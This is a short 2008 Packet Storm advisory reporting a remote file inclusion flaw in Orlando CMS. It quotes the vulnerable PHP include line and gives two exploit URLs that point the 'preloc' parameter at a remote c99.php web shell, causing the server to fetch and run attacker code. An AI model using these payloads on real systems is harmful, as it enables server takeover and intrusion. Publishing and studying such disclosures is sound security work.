orlando-rfi.txt

2008-06-19T00:00:00
ID PACKETSTORM:67490
Type packetstorm
Reporter Ciph3r
Modified 2008-06-19T00:00:00

Description

                                        
                                            `###############################################################  
#  
# Orlando CMS classes Remote File Include Vulnerabilities  
#  
###############################################################  
#  
# Discovered by : Ciph3r  
#  
#  
# MAIL : Ciph3r_blackhat@yahoo.com  
#  
#  
# SP TANX4 : Iranian hacker & Kurdish Security TEAM  
#  
#  
# CLASS : remote  
#  
# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547  
#  
################################################################  
#  
# C0de :  
#   
#   
# include($GLOBALS['preloc']."modules/core/logger/sticky.php");  
#   
#   
###############################################################  
  
EXPLOIT :  
  
http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?  
  
http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?  
  
#####################################################################  
`